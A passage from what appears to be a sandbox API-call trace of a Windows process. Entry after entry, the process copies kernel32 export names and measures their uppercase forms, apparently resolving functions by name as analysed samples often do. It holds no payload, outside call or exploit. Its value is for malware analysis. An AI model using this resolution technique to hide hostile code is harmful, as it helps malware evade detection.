lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.968] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.968] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.968] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.968] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.968] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.969] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.969] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.969] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.969] lstrlenA (lpString="COPYFILEA") returned 9 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.969] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.969] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.969] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.969] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.969] lstrlenA (lpString="COPYFILEW") returned 9 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.969] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.969] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.969] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.969] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.969] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.969] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.969] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.969] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.969] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.970] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.970] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.970] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.970] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.970] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.970] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.970] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.970] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.970] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.970] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.970] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.970] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.970] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.970] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.970] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.970] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.970] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.970] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.970] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.971] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.971] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.971] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.971] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.971] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.971] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.971] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.971] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.971] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.971] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.971] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.971] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.971] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.971] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.971] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.971] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.971] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.971] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.971] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.971] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.972] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.972] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.972] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.972] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.972] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.972] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.972] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.972] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.972] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.972] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.972] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.972] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.972] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.972] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.972] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.972] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.972] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.972] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.972] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.973] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.973] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.973] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.973] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.973] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.973] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.973] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.973] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.973] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.973] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.973] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.973] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.973] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.973] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.973] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.973] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.973] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.973] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.974] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.974] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.974] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.974] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.974] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.974] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.974] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.974] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.974] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.974] lstrlenA (lpString="DELETEATOM") returned 10 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.974] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.974] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.974] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.974] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.974] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.974] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.974] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.974] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.974] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.975] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.975] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.975] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.975] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.975] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.975] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.975] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.975] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.975] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.975] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.975] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.975] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.975] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.975] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.975] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.975] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.975] lstrcpyA (in: 